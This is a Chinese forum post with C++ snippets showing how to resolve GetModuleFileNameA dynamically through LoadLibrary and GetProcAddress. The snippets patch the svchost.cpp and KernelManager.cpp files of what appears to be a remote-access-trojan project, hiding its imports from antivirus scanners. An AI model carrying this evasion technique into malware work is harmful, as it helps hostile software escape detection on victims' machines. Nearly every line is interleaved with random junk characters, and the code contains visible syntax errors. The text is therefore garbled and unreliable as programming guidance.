[原创文章] 全局动态调用 全局, 动态

ice_xke

全局动态调用笔记  K+ C2 D; m" j: E; }3 e% ]4 y
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h, U( G$ G2 O  O7 ^% H( l
----------------------------------------$ x2 D& Q% y7 s! y$ w( j2 L
DTDY.h：
; }$ ~9 @& y6 L" f4 x3 Y3 r2 h  O3 l4 J
#if _MSC_VER>1000
* @, v# M* R7 `* v4 o. j. ^9 W#pragma once
3 h1 e8 M' \9 ?- q7 e8 S7 Z#endif //_MSC_VER>1000
4 O( {; A  {8 L2 n3 S#include<windows.h>: b  I' v) b  Y' ^

. z( X# g( L- v/ z' Utypedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
6 s$ X; U. R  ]; Q5 X0 j0 Sclass DTDY
& m2 q7 y9 Y6 C; f4 j8 H{
( p" d9 `8 v" f4 A$ y5 Npublic:
% I$ {: ?! i% y$ fDTDY();( i; K6 n5 A6 o& b+ H6 j- V3 ^7 o
virtual ~DTDY();/ B0 f7 \1 A8 r0 s7 g% `8 k3 A
public:
$ }0 d0 l8 Y# J! S7 I! o8 Z5 fstatic pGetModuleFileNameA MyGetModuleFileName;
+ P' N5 n/ ?  P: K' ?static BOOL FunInitiallization();5 V! ~  f5 W* G) K2 W
};1 o, c- [, _+ [# }9 f' q
#endif
* _( \. m5 F& t, V; Z$ `3 Y: x----------------------------------------2 }# X% s5 u" f7 o  \; B) k7 A
* g& U9 c3 H) r/ ~2 V  h
DTDY.cpp:! j( l! f( E# r& K- V$ h

- f1 {% F. K2 X$ J) x4 Q#include "DTDY.h"
5 s9 v& N+ b* N& K( i, @pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;/ ]" }5 q, `- Y8 l% ~
DTDY:TDY()+ H% }8 K9 [9 Y7 I8 v
{. c$ c8 ^  R2 N
}- v" q" T& y5 S: i& P1 Q
DTDY::~DTDY()$ G. @. ~* }, @0 ?- D6 q) ?0 f) X3 x$ i
{, d; @* d+ k+ ]  p: l7 E& k
}
; U, K' `4 p" }# bBOOL DTDY::FunInitiallization(); E% Z9 d, y! R3 A+ S# F: t
{" J" F0 K- l6 I
HMODULE hModule=LoadLibrary("kernel32.dll");
  D# U* h) e; q8 z% p/ nMyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
6 R3 g3 n1 w! W& Eif(!MyGetModuleFileName=) return FALSE;
6 s* @9 K) m' F7 k! i1 k
$ m1 J' h$ m, ?4 Y/ N5 zreturn TRUE;
/ T0 H' Q& B3 s) C% D3 s}
7 [- J. O3 f5 r7 T7 u' _+ k1 J+ \----------------------------------------
9 y! C; x' ?$ n5 j: |+ Wsvchost.cpp:9 S: k$ g9 z+ ~9 Z

6 ^# ^6 x# m% n3 ~; T3 i#include "DTDY.h"4 D$ }, d- Z: h0 J, z+ G/ K$ B
$ l# \6 Z/ {1 @; @
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
* o3 `. m% Q& o( [/ i  U9 o6 F{/ p2 K& D  m7 C. j
switch(ul_reason_for_call)$ D. X) V1 J2 ]# Z. [5 R
{" F* ^6 U, \1 \; _! A6 e
case DLL_PROCESS_ATTACH:
: b9 s6 Y  C0 ?$ A' r* |) oif(!DTDY::FunInitiallization()) return FALSE;
8 K! y* J$ k7 U' e: ~  P# t5 `, R
6 k6 \8 s2 p) T3 @0 p4 qbreak;
0 {$ a9 W- n$ I/ n+ `( \}
7 M1 L5 T1 V5 q}5 q: v" m0 R& g
6 z9 t$ j  B3 p' f$ t1 [' Q

% l1 ?1 B9 \7 P! T) ^GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def0 V" @- A% ?0 M5 {- N
改写为
1 r" Q! }; V3 c) dDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));2 j3 H' x1 u/ f' ?; f  e* i
----------------------------------------
% A! y2 t- T* V) W0 c) v- UKernelManager.cpp:
& m1 J1 ]7 o5 t
2 y8 _, J6 n7 H, n#include "../DTDY.h"* ~" y* |6 n1 b1 v0 N# a/ `
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));% V! B; U# m  i& M0 i) O
改写为* d+ W- b+ ~3 `+ B" F5 w" Q
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));+ D, h' N, }" e8 B
----------------------------------------